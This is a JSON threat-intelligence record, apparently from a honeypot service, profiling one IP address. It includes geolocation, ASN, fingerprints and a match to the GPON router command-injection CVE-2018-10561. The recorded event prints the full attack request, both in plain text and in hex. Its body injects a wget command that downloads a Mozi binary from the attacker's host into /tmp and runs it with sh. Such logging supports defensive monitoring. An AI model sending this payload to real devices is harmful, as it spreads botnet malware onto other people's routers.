{"ip":"202.9.122.224","total_events":1,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"residential ISP"},"first_seen":"2026-06-11T02:06:02","last_seen":"2026-06-11T02:06:02","events_24h":0,"events_7d":0,"geo":{"country_code":"IN","country_name":"India","region":"Haryana","city":"Rohtak","lat":28.8964,"lon":76.5909,"asn":137120,"org":"Nas Internet Services Private Limited"},"source_domain":"axntech-dynamic-224.122.9.202.axntechnologies.in","known_scanners":[],"scanner_tag":{"key":"peeringdb:as137120","label":"Nas Internet Services","category":"isp","url":"https://www.peeringdb.com/asn/137120"},"cve_matches":[{"cve_id":"CVE-2018-10561","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form"}],"top_ports":[{"port":8080,"proto":"tcp","label":"HTTP-alt","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["po11nn0600_1386cd485c90"]},"fingerprint_peers":{"po11nn0600_1386cd485c90":23},"user_agents":["Hello, World"],"timeline":[{"date":"2026-06-11","count":1}],"recent_events":[{"timestamp":"2026-06-11T02:06:02","port":8080,"proto":"tcp","app_proto":"","app_protocol":"http","host":"127.0.0.1","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"118\",\"host\":\"127.0.0.1:8080\",\"user-agent\":\"Hello, World\"}","body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://202.9.122.224:35583/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/GponForm/diag_Form?images/","summary":"","payload_hex":"504f5354202f47706f6e466f726d2f646961675f466f726d3f696d616765732f20485454502f312e310d0a486f73743a203132372e302e302e313a383038300d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570743a202a2f2a0d0a557365722d4167656e743a2048656c6c6f2c20576f726c640d0a436f6e74656e742d4c656e6774683a203131380d0a0d0a58576562506167654e616d653d6469616726646961675f616374696f6e3d70696e672677616e5f636f6e6c6973743d3026646573745f686f73743d60603b776765742b687474703a2f2f3230322e392e3132322e3232343a33353538332f4d6f7a692e6d2b2d4f2b2d3e2f746d702f67706f6e383038303b73682b2f746d702f67706f6e38303830266970763d30","method":"POST","user_agent":"Hello, World","community_id":"1:lhbuQ+w1CHQjM3SN0/sIkrypRfE=","ja3":"","session":"6b9df293-b9e8-4fa5-8731-ac029d12dc0d","seq":1,"duration_ms":100,"bytes_in":325,"bytes_out":78}],"http_methods":[{"method":"POST","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/GponForm/diag_Form?images/","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[{"value":"127.0.0.1","count":1}],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Connection","Content-Length","Host","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"118","notable":false},{"name":"Host","value":"127.0.0.1:8080","notable":false},{"name":"User-Agent","value":"Hello, World","notable":false}],"distinct_sets":1,"events_with_headers":1},"tags":[{"tag_id":"CVE-2018-10561","tag_type":"cve","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form","reference_urls":[]}],"data_as_of":"2026-06-20T10:55:25.063964+00:00"}